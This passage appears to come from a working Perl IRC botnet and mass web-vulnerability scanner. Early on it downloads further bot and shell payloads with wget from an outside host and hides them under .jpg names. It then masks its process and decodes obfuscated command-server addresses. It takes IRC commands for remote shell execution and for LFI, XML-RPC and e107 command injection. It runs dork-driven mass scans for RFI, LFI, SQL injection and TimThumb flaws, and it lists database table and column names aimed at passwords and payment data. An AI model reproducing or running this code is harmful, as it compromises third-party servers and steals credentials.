  154.                                  'Mozilla/4.61 (Macintosh; I; PPC)',
  155.                                  'Mozilla/4.61 [en] (OS/2; U)',
  156.                                  'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)','Mozilla/4.8 [en] (Windows NT 5.0; U)',
  157.                                  'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  158.                                  'msnbot/1.1 (+http://search.msn.com/msnbot.htm)',
  159.                                  'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
  160.                                  'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
  161.                                  'FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)',
  162.                                  'Gigabot/3.0 (http://www.gigablast.com/spider.html)',
  163.                                  'gsa-crawler (Enterprise; GID-01422; jplastiras@google.com)',
  164.                                  'Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12',
  165.                                  'IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)',
  166.                                  'Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4',
  167.                                  'Infoseek SideWinder/2.0B (Linux 2.4 i686)',
  168.                                  'Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6',
  169.                                  'Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)',
  170.                                  'Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
  171.                                  'Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)',
  172.                                  'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)');
  173.                                  
  174. my $uagent    = $uagents[rand(scalar(@uagents))];
  175. my $lfdtest   = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
  176. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  177. my $adm_output = ("uid=");
  178. my $open_output = ("FCKeditor - Connectors Tests");
  179.  
  180. my @tabele              = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','name','names','nombre','nombres',
  181.                                         'usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator','passwd',
  182.                                         'administrators','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','mods',
  183.                                         'user_name','user_names','member_password','mod','moderators','moderator','user_email','user_emails','user_mail',
  184.                                         'user_mails','mail','emails','email','address','e-mail','emailaddress','correo','correos','phpbb_users','log',
  185.                                         'logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tpassword','tPassword',
  186.                                         'u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave',
  187.                                         'login_id','pwd','pas','sistema_id','sistema_usuario','sistema_password','contrasena','auth','key','senha',
  188.                                         'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
  189.                                         'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account',
  190.                                         'accnts','associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers',
  191.                                         'utilisateurs','password','amministratore','god','God','authors','asociado','asociados','autores','membername',
  192.                                         'autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','paypal','credit','bank','transaction',
  193.                                         'order','account','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  194. my @kolumny             = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  195.                                         'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  196.                                         'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  197.                                         'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  198.                                         'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  199.                                         'paypal','credit','bank','transaction','order','account','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password',
  200.                                         'autor','upassword','web_password','web_username');
  201.  
  202. my %conf = (
  203.   shchan => 1,          # Shell info shown in $shchn
  204.   ssfind => 0,          # Show search engine founded sites
  205.   ssdone => 0,          # Show when scan is done
  206.   soscos => 1,          # Show osco meby vurln sites
  207.   stindb => 0           # Show TIMTHUMB results for debug
  208. );
  209.  
  210. $SIG{'INT'}   = 'IGNORE';
  211. $SIG{'HUP'}   = 'IGNORE';
  212. $SIG{'TERM'}  = 'IGNORE';
  213. $SIG{'CHLD'}  = 'IGNORE';
  214. $SIG{'PS'}    = 'IGNORE';
  215. chdir("/tmp");
  216. chop (my $priper = `wget http://blogger.com.midislandrental.com/.mods/pbot.txt -O pbot.jpg && rm -rf pbot.jpg.* && wget http://blogger.com.midislandrental.com/.mods/sh.txt -O sh.jpg && rm -rf sh.jpg.* && wget http://blogger.com.midislandrental.com/.mods/sd.txt -O sl.jpg && rm -rf sl.jpg.*`);
  217. $verbindingen = $verbindnaar[rand(scalar(@verbindnaar))];
  218. $verbindport = $deurtje[rand(scalar(@deurtje))];
  219. $ircserver = "$ARGV[0]" if $ARGV[0];
  220. $0 = "$faceproc"."\0" x 16;
  221. my $pid = fork;
  222. exit if $pid;
  223. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  224.  
  225. our %irc_servers;
  226. our %DCC;
  227. my $dcc_sel = new IO::Select->new();
  228. $sel_client = IO::Select->new();
  229. sub sendraw {
  230.     if ($#_ == '1') {
  231.     my $socket = $_[0];
  232.     print $socket "$_[1]\n";
  233.     } else {
  234.         print $IRC_cur_socket "$_[0]\n";
  235.     }
  236. }
  237. my @domen = ('biz','info','org','net','edu','gov','mil','ps','gr','off.ai','vu','kw','com.uy','aq','vg','lk','gw','eh','lv','sj','com.na','na','bv','com.ph','ph','ca','mp','td','be','kh','com.mx','mx','com.jm','jm','zr','com.ni','ni','com.gi','gi','th','co.th','co.ke','ke','va','it','to','kg','com.bo','bo','com.mt','tm','ge','co.ls','ls','mz','sc','ee','tc','com.bz','bz','cv','co.kr','co.cr','cr','am','yu','com.ar','ar','li','ne','re','co.il','il','com.pr','pr','com.et','et','co.id','id','iq','nc','co.in','sh','com.my','my','hr','bs','com.ec','ec','ba','ad','co.za','nl','cl','nz','co.nz','co.hu','hu','bg','is','co.uk','tf','er','gh','eu','uz','en','ie','co.im','la','fr','cd','co.ug','lc','tt','zw','com.bd','bd','ro','cf','io','an','pn','mh','ye','dm','sr','cn','bb','ru','mm','ms','hm','kn','tk','bt','fo','lr','pk','com.tj','com.ly','ly','com.sb','sb','tg','mt','si','lb','com.af','af','bj','jo','ax','pg','com.br','br','mr','ml','km','co.zm','ma','gb','kz','yt','mw','sd','mn','ky','bf','gm','kp','a1','lt','ch','lu','qa','ci','um','pa','com.pa','in','st','rw','ga','as','cx','co.ck','ck','sl','ht','co.ve','cz','com.pe','pe','md','bi','com.nf','nf','com.vn','me','tl','so','com.co','co','gn','gs','mo','fi','no','co.bw','bw','tv','bn','dz','co.vi','cm','com.om','om','com.do','do','pf','com.vc','nr','aw','sm','ao','mu','fm','gl','by','es','fk','gt','com.gt','co.je','hn','at','al','pw','mc','o1','ai','ua','ap','com.hk','hk','cy','com.pk','gp','eg','wf','kr','gf','com.au','pm','ae','us','com.np','np','cu','com.cu','fx','com.py','py','cs','gu','gd','pt','sz','tz','cg','sn','sy','pl','tr','com.sa','sa','ki','dj','ir','rs','com.sg','sg','ng','tn','mg','ws','com.tr','com.fj','fj','mq','sk','gq','mk','a2','nu','com.sv','sv','gy','mv','de','com.ag','ag','se','bh','com.tw','tw','cc','co.jp','jp','az');
  238. sub connector {
  239.     my $mynick = $_[0];
  240.     my $ircserver_con = $_[1];
  241.     my $ircport_con = $_[2];
  242.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  243.     if (defined($IRC_socket)) {
  244.         $IRC_cur_socket = $IRC_socket;
  245.         $IRC_socket->autoflush(1);
  246.         $sel_client->add($IRC_socket);
  247.                 $irc_servers{$IRC_cur_socket}{'host'} = $ircserver_con;
  248.         $irc_servers{$IRC_cur_socket}{'port'} = $ircport_con;
  249.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  250.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  251.         nick("$mynick");
  252.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$nob0dy");
  253.         sleep (1);}}
  254. my $ssssss = reverse(decode_base64(uri_unescape($verbindingen))); $ssss = uri_unescape($ssssss);
  255. my $pppppp = reverse(decode_base64(uri_unescape($verbindport))); $pppp = uri_unescape($pppppp);
  256. my $inj = reverse(decode_base64(uri_unescape($inject0r))); my $injector  = uri_unescape($inj);
  257. my $bots = reverse(decode_base64(uri_unescape($b0tshell))); my $botshell  = uri_unescape($bots);
  258. my $bota = reverse(decode_base64(uri_unescape($b0tak))); my $botak = uri_unescape($bota);
  259. sub parse {
  260.     my $servarg = shift;
  261.     if ($servarg =~ /^PING \:(.*)/) {
  262.         sendraw("PONG :$1");
  263.     }
  264.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  265.         if (lc($1) eq lc($mynick)) {
  266.             $mynick = $4;
  267.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  268.         }
  269.     }
  270.     elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  271.         nick("$mynick".int rand(1));
  272.     }
  273.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  274.         $mynick = $2;
  275.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  276.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  277.         sendraw("MODE $mynick +ixp");
  278.         sendraw("JOIN $channel");
  279.         sleep(2);
  280.     }
  281.         elsif ($servarg =~ /002/ ) { sendraw("JOIN $channel");sleep(2); }
  282.         elsif ($servarg =~ /003/ ) { sendraw("JOIN $channel");sleep(2); }
  283.         elsif ($servarg =~ /004/ ) { sendraw("JOIN $channel");sleep(2); }
  284.         elsif ($servarg =~ /005/ ) { sendraw("JOIN $channel");sleep(2); }
  285. }
  286. my $line_temp;
  287. while( 1 ) {
  288.     while (!(keys(%irc_servers))) { &connector("$nickname", "$ssss", "$pppp"); }
  289.     select(undef, undef, undef, 0.01);
  290.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  291.     my @ready = $sel_client->can_read(0);
  292.     next unless(@ready);
  293.     foreach $fh (@ready) {
  294.         $IRC_cur_socket = $fh;
  295.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  296.         $nread = sysread($fh, $ircmsg, 4096);
  297.         if ($nread == 0) {
  298.             $sel_client->remove($fh);
  299.             $fh->close;
  300.             delete($irc_servers{$fh});
  301.         }
  302.         @lines = split (/\n/, $ircmsg);
  303.         $ircmsg =~ s/\r\n$//;
  304.  
  305.         if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  306.             my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  307.                         my $engine = 'Google,Google2,GigaBlast,EuroSeek,Alltheweb,Bing,Mamma,Altavista,Ask,Uol,Yahoo,Yahoo2,Clusty,Gutser,Rediff,Virgilio,Webde,Exalead,Lycos,Hotbot,Aol,Sapo,Duck,Yause,Baidu,Black,Onet,Sizuka,Walla,Demos,Rose,Seznam,Tiscali,Naver,AmiDalLa,BusCaR,KvaSiR,eXciTe,InteRia,SnZ,RambLer,YaNdeX,NetSprint,sAol,Lookle,optusZoo,Search66,Arrama,eXciteJP,BigLobe,Clix,SearchCH,Cada';
  308.             if ($path eq $mynick) {
  309.                 if ($msg =~ /^ PING (.*) /) {
  310.                     sendraw("NOTICE $nick : PING $1 ");
  311.                 }
  312.                 if ($msg =~ /^ VERSION /) {
  313.                     sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
  314.                 }
  315.                 if ($msg =~ /^ TIME /) {
  316.                     sendraw("NOTICE $nick : TIME ".$datetime." ");
  317.                 }
  318.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  319.                     &shell("$path","kill -9 $$");
  320.                 }
  321.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  322.                     &shell("$path","killall -9 perl");
  323.                 }
  324.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  325.                     sendraw("QUIT :Restarting...");
  326.                 }
  327.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  328.                     sendraw($IRC_cur_socket, "PRIVMSG $nick :0,1Fake Process/PID : $fakeproc - $$");
  329.                 }
  330.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  331.                                         my $url = $1.$lfdtest;
  332.                                         my $cmd = $2;
  333.                                         &cmdlfi($url,$cmd,$nick);
  334.                                 }
  335.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  336.                                         my $url = $1;
  337.                                         my $cmd = $2;
  338.                                         &cmdxml($url,$cmd,$nick);
  339.                                 }
  340.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
  341.                                         my $url = $1;
  342.                                         my $cmd = $2;
  343.                                         &cmde107($url,$cmd,$nick);
  344.                                 }
  345.            }
  346.             else {
  347.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  348.                     &shell("$path","kill -9 $$");
  349.                 }
  350.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  351.                     &shell("$path","killall -9 perl");
  352.                 }
  353.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  354.                     sendraw("QUIT :Restarting...");
  355.                 }
  356.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  357.                     &shell("$path","$1");
  358.                 }
  359.                                 ##################################################################### HIT
  360.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
  361.                                         my $url = $1.$lfdtest;
  362.                                         my $cmd = $2;
  363.                                         &cmdlfi($url,$cmd,$path);
  364.                                 }
  365.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
  366.                                         my $url = $1;
  367.                                         my $cmd = $2;
  368.                                         &cmdxml($url,$cmd,$path);
  369.                                 }
  370.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.+?)\s+(.*)/){
  371.                                         my $url = $1;
  372.                                         my $cmd = $2;
  373.                                         &cmde107($url,$cmd,$path);
  374.                                 }
  375.                 ##################################################################### HELP COMMAND
  376.                 if ($path =~ $channel && $msg=~ /^!help/) {
  377.                     my $helplogo = "12(4@0Help12)";
  378.                     &msg("$path","$helplogo 6################################################### ");
  379.                                         &msg("$path","$helplogo 6# !domrfi  / !domlfi / !domtim 14ªª 12[0bug12] [0dork12] AUTO ADD RANDOM DOMAIN 14´´ 6# ");
  380.                     &msg("$path","$helplogo 6# $rficmd  / $lficmd / $lfdcmd / $sqlcmd / $xmlcmd / $timcmd 14ªª 12[0bug12] [0dork12] 14´´ 6# ");
  381.                     &msg("$path","$helplogo 6# $cmde107 / $cmdlfi / $cmdxml 14ªª12 [0target12] [0cmd12] 14´´  6# ");
  382.                     &msg("$path","$helplogo 6# $e107cmd / $oscocmd / $cpancmd / $zencmd / $admcmd 12[0dork12] 14||| 6# ");
  383.                     &msg("$path","$helplogo 6################################################### ");
  384.                 }
  385.                 if ($path =~ $channel && $msg=~ /^!engine/) {
  386.                     my $enginelogo = "12(4@0Engine12)";
  387.                                         &msg("$path","9$enginelogo 13 Google, Google2, GigaBlast, EuroSeek, Alltheweb, Bing, Mamma, Altavista, Ask, Uol, Yahoo, Yahoo2, Clusty,");
  388.                                         &msg("$path","9$enginelogo 13 Gutser,Rediff, Virgilio, Webde, Exalead, Lycos, Hotbot, Aol, Sapo, Duck, Yause, Baidu, Black, Onet, Sizuka,");
  389.                                         &msg("$path","9$enginelogo 13 Walla, Demos, Rose, Seznam, Tiscali, Naver, AmiDalLa, BusCaR, KvaSiR, eXciTe, InteRia, SnZ, RambLer, YaNdeX,");
  390.                                         &msg("$path","9$enginelogo 13 NetSprint, sAol, Lookle, optusZoo, Search66, Arrama, eXciteJP, BigLobe, Clix, SearchCH, Cada");
  391.                 }
  392.                 if ($path =~ $channel && $msg=~ /^!about/) {
  393.                     my $aboutlogo = "13(8@0About Bot13)";
  394.                     &msg("$path","$aboutlogo 13Fuckin Multi Scanner Owned By 4,1CraZy8Creation9Zzz ");
  395.                 }
  396.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!cinj\s+(.*)/) {
  397.                                         my ($url) = ($1);
  398.                                         $injector = $url;
  399.                                         &msg("$path","12[0Injector12] 14ªª 9$url 14´´");
  400.                                 }
  401.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!cbsh\s+(.*)/) {
  402.                                         my ($url) = ($1);
  403.                                         $botshell = $url;
  404.                                         &msg("$path","12[0BotShell12] 14ªª 9$url 14´´");
  405.                                 }              
  406.                 if ($path =~ $channel && $msg=~ /^!respon/ || $msg=~ /^!id/) {
  407.                     if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  408.                         &msg("$path","12[0Injector12] 14ªª 9OKE 14´´ ");
  409.                     } else {
  410.                         &msg("$path","12[0Injector12] 14ªª 13ERROR 14´´ ");
  411.                     }
  412.                 }
  413.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  414.                     &notice("$nick","0,1Fake Process/PID : 8$fakeproc - $$");
  415.                 }
  416.                                
  417.                 ##################################################################### RFI SCAN
  418.                 if ($path =~ $channel && $msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
  419.                     if (my $pid = fork) {
  420.                         waitpid($pid, 0);
  421.                     }
  422.                     else {
  423.                         if (fork) { exit; } else {
  424.                             my ($bug,$dork) = ($1,$2);
  425.                             &msg("$path","$rfilogo 13Dork :9 $dork");
  426.                             &msg("$path","$rfilogo 13Bugz :9 $bug");
  427.                             &msg("$path","$rfilogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  428.                             &scan_start($path,$bug,$dork,$engine,1);
  429.                         }
  430.                                                 exit;
  431.                     }
  432.                 }
  433.                                 ##################################################################### DOMRFI
  434.                                 if ($path =~ $channel && $msg=~ /^!domrfi\s+(.+?)\s+(.*)/ ) {
  435.                                         if (my $pid = fork) {
  436.                                                 waitpid($pid, 0);
  437.                                         }
  438.                                         else {
  439.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  440.                                                 if (fork) {    exit; } else {
  441.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  442.                                 my ($bug,$dork) = ($1,"".$2." site:.".$domens);
  443.                                 &msg("$path","$rfilogo 13Dork :9 $dork");
  444.                                 &msg("$path","$rfilogo 13Bugz :9 $bug");
  445.                                 &msg("$path","$rfilogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  446.                                 &scan_start($path,$bug,$dork,$engine,1);
  447.                             } else {
  448.                                 &msg("$path","12[0 $nick 12] $rfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  449.                             }exit;
  450.                                                 }
  451.                                                 }
  452.                                     }
  453.                                 }
  454.                                 ##################################################################### tim RFI SCAN
  455.                 if ($path =~ $channel && $msg=~ /^$timcmd\s+(.+?)\s+(.*)/) {
  456.                     if (my $pid = fork) {
  457.                         waitpid($pid, 0);
  458.                     }
  459.                     else {
  460.                         if (fork) { exit; } else {
  461.                                                         if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  462.                                                                 my ($bug,$dork) = ($1,$2);
  463.                                                                 &msg("$path","$timlogo 13Dork :9 $dork");
  464.                                                                 &msg("$path","$timlogo 13Bugz :9 $bug");
  465.                                                                 &msg("$path","$timlogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  466.                                                                 &scan_start($path,$bug,$dork,$engine,16);
  467.                                                         }
  468.                         }
  469.                         exit;
  470.                     }
  471.                 }
  472.                                 ##################################################################### DOM tim RFI SCAN
  473.                                 if ($path =~ $channel && $msg=~ /^!domtim\s+(.+?)\s+(.*)/ ) {
  474.                                         if (my $pid = fork) {
  475.                                                 waitpid($pid, 0);
  476.                                         }
  477.                                         else {
  478.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  479.                                                         if (fork) { exit; } else {
  480.                                 my ($bug,$dork) = ($1,"".$2." site:.".$domens);
  481.                                 &msg("$path","$timlogo 13Dork :9 $dork");
  482.                                 &msg("$path","$timlogo 13Bugz :9 $bug");
  483.                                 &msg("$path","$timlogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  484.                                 &scan_start($path,$bug,$dork,$engine,16);
  485.                                                         }
  486.                                                 exit;
  487.                                                 }
  488.                                     }
  489.                                 }
  490.                                 ##################################################################### LFD SCAN
  491.                 if ($path =~ $channel && $msg=~ /^$lfdcmd\s+(.+?)\s+(.*)/) {
  492.                     if (my $pid = fork) {
  493.                         waitpid($pid, 0);
  494.                     }
  495.                     else {
  496.                         if (fork) { exit; } else {
  497.                             my ($bug,$dork) = ($1,$2);
  498.                             &msg("$path","$lfdlogo 12Dork :4 $dork");
  499.                             &msg("$path","$lfdlogo 12Bugz :4 $bug");
  500.                             &msg("$path","$lfdlogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  501.                             &lfd_start($path,$bug,$dork,$engine,14);
  502.                         }
  503.                         exit;
  504.                     }
  505.                 }
  506.                                 ##################################################################### PmWiki
  507.                 if ($path =~ $channel && $msg=~ /^$pmwicmd\s+(.*)/) {
  508.                     if (my $pid = fork) {
  509.                         waitpid($pid, 0);
  510.                     }
  511.                     else {
  512.                         if (fork) { exit; } else {
  513.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  514.                                 my ($bug,$dork) = ("pmwiki.php",$1);
  515.                                 &msg("$path","$pmwilogo 13Dork :9 $dork");
  516.                                 &msg("$path","$pmwilogo 13Bugz :9 $bug");
  517.                                 &msg("$path","$pmwilogo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  518.                                 &scan_start($path,$bug,$dork,$engine,17);
  519.                             } else {
  520.                                 &msg("$path","12[0 $nick 12] $pmwilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  521.                             }
  522.                         }
  523.                         exit;
  524.                     }
  525.                 }
  526.                 ##################################################################### LFIRCE SCAN
  527.                 if ($path =~ $channel && $msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
  528.                     if (my $pid = fork) {
  529.                         waitpid($pid, 0);
  530.                     }
  531.                     else {
  532.                         if (fork) { exit; } else {
  533.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  534.                                 my ($bug,$dork) = ($1,$2);
  535.                                 &msg("$path","$lfilogo 13Dork :9 $dork");
  536.                                 &msg("$path","$lfilogo 13Bugz :9 $bug");
  537.                                 &msg("$path","$lfilogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  538.                                 &scan_start($path,$bug,$dork,$engine,2);
  539.                             } else {
  540.                                 &msg("$path","12[0 $nick 12] $lfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  541.                             }
  542.                         }
  543.                         exit;
  544.                     }
  545.                 }
  546.                                 ##################################################################### DOMLFI
  547.                                 if ($path =~ $channel && $msg=~ /^!domlfi\s+(.*?)\s+(.*)/ ) {
  548.                                         if (my $pid = fork) {
  549.                                                 waitpid($pid, 0);
  550.                                         }
  551.                                         else {
  552.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  553.                                                 if (fork) {    exit; } else {
  554.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  555.                                 my ($bug,$dork) = ($1,"".$2." site:.".$domens);
  556.                                 &msg("$path","$lfilogo 13Dork :9 $dork");
  557.                                 &msg("$path","$lfilogo 13Bugz :9 $bug");
  558.                                 &msg("$path","$lfilogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  559.                                 &scan_start($path,$bug,$dork,$engine,2);
  560.                             } else {
  561.                                 &msg("$path","12[0 $nick 12] $lfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  562.                             }exit;
  563.                                                 }
  564.                                     }
  565.                     }
  566.                                 }
  567.                 ##################################################################### e107 contact.php SCAN
  568.                 if ($path =~ $channel && $msg=~ /^$e107cmd\s+(.*)/) {
  569.                     if (my $pid = fork) {
  570.                         waitpid($pid, 0);
  571.                     }
  572.                     else {
  573.                         if (fork) { exit; } else {
  574.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  575.                                 my ($bug,$dork) = ("contact.php",$1);
  576.                                 &msg("$path","$e107logo 13Dork :9 $dork");
  577.                                 &msg("$path","$e107logo 13Bugz :9 $bug");
  578.                                 &msg("$path","$e107logo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  579.                                 &scan_start($path,$bug,$dork,$engine,3);
  580.                             } else {
  581.                                 &msg("$path","12[0 $nick 12] $e107logo 4==14E4=15R4=0R4=15O4=14R4== ");
  582.                             }
  583.                         }
  584.                         exit;
  585.                     }
  586.                 }
  587.                                 ##################################################################### DOME107
  588.                                 if ($path =~ $channel && $msg=~ /^!dome107\s+(.+)/ ) {
  589.                                         if (my $pid = fork) {
  590.                                                 waitpid($pid, 0);
  591.                                         }
  592.                                         else {
  593.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  594.                                                 if (fork) {    exit; } else {
  595.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  596.                                 my ($bug,$dork) = ("contact.php","".$1." site:.".$domens);
  597.                                 &msg("$path","$e107logo 13Dork :9 $dork");
  598.                                 &msg("$path","$e107logo 13Bugz :9 $bug");
  599.                                 &msg("$path","$e107logo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  600.                                 &scan_start($path,$bug,$dork,$engine,3);
  601.                             } else {
  602.                                 &msg("$path","12[0 $nick 12] $e107logo 4==14E4=15R4=0R4=15O4=14R4== ");
  603.                             }exit;
  604.                                                 }
  605.                                     }
  606.                     }
  607.                                 }
  608.                                 ##################################################################### XML SCAN
  609.                                 if ($path =~ $channel && $msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
  610.                                         if (my $pid = fork) {
  611.                                                 waitpid($pid, 0);
  612.                                         }
  613.                                         else {
  614.                                                 if (fork) {    exit; } else {
  615.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  616.                                 my ($bug,$dork) = ($1,$2);
  617.                                 &msg("$path","$xmllogo 13Dork :9 $dork");
  618.                                 &msg("$path","$xmllogo 13Bugz :9 $bug");
  619.                                 &msg("$path","$xmllogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11== ");
  620.                                 &scan_start($path,$bug,$dork,$engine,4);
  621.                             } else {
  622.                                 &msg("$path","12[0 $nick 12] $xmllogo 4==14E4=15R4=0R4=15O4=14R4== ");
  623.                             }
  624.                         }
  625.                         exit;
  626.                     }
  627.                 }
  628.                                 ##################################################################### DOMXML
  629.                                 if ($path =~ $channel && $msg=~ /^!domxml\s+(.*?)\s+(.*)/ ) {
  630.                                         if (my $pid = fork) {
  631.                                                 waitpid($pid, 0);
  632.                                         }
  633.                                         else {
  634.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  635.                                                 if (fork) {    exit; } else {
  636.                             if (&isFound($injector,"pVd5c9pIFv97XeXv0NFm")) {
  637.                                 my ($bug,$dork) = ($1,"".$2." site:.".$domens);
  638.                                 &msg("$path","$xmllogo 13Dork :9 $dork");
  639.                                 &msg("$path","$xmllogo 13Bugz :9 $bug");
  640.                                 &msg("$path","$xmllogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11== ");
  641.                                 &scan_start($path,$bug,$dork,$engine,4);
  642.                             } else {
  643.                                 &msg("$path","12[0 $nick 12] $xmllogo 4==14E4=15R4=0R4=15O4=14R4== ");
  644.                             }exit;
  645.                                                 }
  646.                                     }
  647.                     }
  648.                                 }
  649.                 ##################################################################### SQL SCAN
  650.                 if ($path =~ $channel && $msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  651.                     if (my $pid = fork) {
  652.                         waitpid($pid, 0);
  653.                     }
  654.                     else {
  655.                         if (fork) { exit; } else {
  656.                             my ($bug,$dork) = ($1,$2);
  657.                             &msg("$path","$sqllogo 13Dork :9 $dork");
  658.                             &msg("$path","$sqllogo 13Bugz :9 $bug");
  659.                             &msg("$path","$sqllogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  660.                             &scan_start($path,$bug,$dork,$engine,5);
  661.                         }
  662.                         exit;
  663.                     }
  664.                 }
  665.                 ##################################################################### OSCO SCAN
